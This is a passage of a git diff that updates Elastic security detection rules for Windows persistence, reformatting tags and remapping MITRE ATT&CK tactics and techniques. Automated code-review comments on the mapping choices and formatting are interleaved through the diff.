 rule_id = "da87eee1-129c-4661-a7aa-57d0b9645fad"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
- "Data Source: Windows Security Event Logs",
- "Data Source: Windows System Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Windows System Event Logs"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -139,19 +131,36 @@ any where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1543.003"
+name = "Windows Service"
+reference = "https://attack.mitre.org/techniques/T1543/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml
index e142ec77150..ef840dc41aa 100644
--- a/rules/windows/persistence_services_registry.toml
+++ b/rules/windows/persistence_services_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/10/07"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -117,31 +117,31 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1112"
+name = "Modify Registry"
+reference = "https://attack.mitre.org/techniques/T1112/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1112"
-name = "Modify Registry"
-reference = "https://attack.mitre.org/techniques/T1112/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml
index 12ea89d5a27..3ca6ca332f6 100644
--- a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml
+++ b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/03"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -100,15 +100,7 @@ This rule looks for unsigned processes writing to the Startup folder locations.
 risk_score = 47
 rule_id = "2fba96c0-ade5-4bce-b92f-a5df2509da3f"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
- "Data Source: Elastic Defend",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Defend"]
 type = "eql"
 query = '''
@@ -131,36 +123,18 @@ sequence by host.id, process.entity_id with maxspan=5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-[[rule.threat.technique.subtechnique]]
-id = "T1036.001"
-name = "Invalid Code Signature"
-reference = "https://attack.mitre.org/techniques/T1036/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_startup_folder_scripts.toml b/rules/windows/persistence_startup_folder_scripts.toml
index 2458d45409b..9adfc9ad184 100644
--- a/rules/windows/persistence_startup_folder_scripts.toml
+++ b/rules/windows/persistence_startup_folder_scripts.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -145,24 +145,18 @@ file where host.os.type == "windows" and event.type != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1547.009"
-name = "Shortcut Modification"
-reference = "https://attack.mitre.org/techniques/T1547/009/"
-
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml
index d995fc89f5d..ef56b4fffb8 100644
--- a/rules/windows/persistence_suspicious_com_hijack_registry.toml
+++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/29"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -62,16 +62,7 @@ references = [ risk_score = 21 rule_id = "16a52c14-7883-47af-8745-9357803f0d4c" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -151,48 +142,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index fcea266ea46..e09bae6d5d5 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -123,17 +123,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -147,36 +137,18 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index ed301eb30bb..fbf4a9d2f66 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -122,36 +122,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/persistence_suspicious_service_created_registry.toml b/rules/windows/persistence_suspicious_service_created_registry.toml index ec8cdfbd5d8..74baf725777 100644 --- a/rules/windows/persistence_suspicious_service_created_registry.toml +++ b/rules/windows/persistence_suspicious_service_created_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
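Review bot: The swap of the two `[[rule.threat]]` entries (Execution now first, Persistence second) is pure churn unless something depends on the order: no technique, sub-technique or tactic changes, yet both tactic blocks are rewritten in the diff. If the order is meant to mark the primary tactic, the `tags` array for this rule (not in this hunk) should list `"Tactic: Execution"` first, as the BITS notify and hidden run key rules in this patch do when they reorder their threat entries; otherwise drop the swap and keep only the blank-line normalization.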
@@ -61,20 +61,7 @@ Windows services are crucial for running background processes. Adversaries explo risk_score = 73 rule_id = "36a8e048-d888-4f61-a8b9-0f9e2e40f317" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -89,31 +76,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml index e3c5bf98f82..f5149a2636f 100644 --- a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml +++ b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
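Review bot: The new second `[[rule.threat]]` entry has no blank line between `reference = "https://attack.mitre.org/techniques/T1543/"` and `[[rule.threat.technique.subtechnique]]`, while the first entry in the same hunk gains blank lines before both `[[rule.threat.technique]]` and `[[rule.threat.technique.subtechnique]]`; the same mix appears in the added T1569/T1569.002 block of persistence_system_shells_via_services.toml and the added T1098/T1098.007 block of persistence_user_account_added_to_privileged_group_ad.toml. Pick one layout per file, the blank-line-separated one the rest of the hunk normalizes to, so the two parallel entries can be compared by eye.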
@@ -86,27 +86,13 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] - -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_sysmon_wmi_event_subscription.toml b/rules/windows/persistence_sysmon_wmi_event_subscription.toml index 53d948bc8c5..ce0534283f4 100644 --- a/rules/windows/persistence_sysmon_wmi_event_subscription.toml +++ b/rules/windows/persistence_sysmon_wmi_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/02" integration = ["windows", "endpoint"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,15 +56,7 @@ references = [ risk_score = 47 rule_id = "e72f87d0-a70e-4f8d-8443-a6407bc34643" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Sysmon", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Sysmon", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -82,19 +74,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.003" +name = "Windows Management Instrumentation Event Subscription" +reference = "https://attack.mitre.org/techniques/T1546/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 2a0d907bce6..22823784c3b 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -90,21 +90,7 @@ This rule looks for system shells being spawned by `services.exe`, which is comp risk_score = 47 rule_id = "0022d47d-39c7-4f69-a232-4fe9dc7a3acd" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -120,27 +106,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
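Review bot: Removing the Persistence tactic entirely from `persistence_system_shells_via_services.toml` while keeping T1543.003 Windows Service only under the new Privilege Escalation entry (next hunk) narrows the mapping: a shell spawned by `services.exe` implies a service was created or modified, and that is the persistence mechanism as much as the escalation, which is why persistence_suspicious_service_created_registry.toml in this same patch lists T1543.003 under both tactics. If the intent is that this rule covers only execution and escalation, the rule's name/path and description should say so; otherwise keep a Persistence entry for T1543.003 and the `"Tactic: Persistence"` tag this hunk deletes.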
@@ -151,10 +122,35 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index fbc8a28fda9..696d3b70b43 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -54,15 +54,7 @@ references = ["https://docs.microsoft.com/en-us/windows/security/threat-protecti risk_score = 47 rule_id = "81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -74,36 +66,18 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 7b99257a7d9..192d83104bd 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -105,20 +105,7 @@ references = ["https://pentestlab.blog/2019/10/22/persistence-time-providers/"] risk_score = 47 rule_id = "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -137,36 +124,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.003" -name = "Time Providers" -reference = "https://attack.mitre.org/techniques/T1547/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index 708d2187cb4..f37d13c84d1 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/24" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Skoetting"] 
@@ -51,16 +51,7 @@ references = [ risk_score = 47 rule_id = "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -102,14 +93,36 @@ iam where host.os.type == "windows" and event.action == "added-member-to-group" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 2bab46a9d12..2b400ddc389 100644 --- a/rules/windows/persistence_user_account_creation.toml 
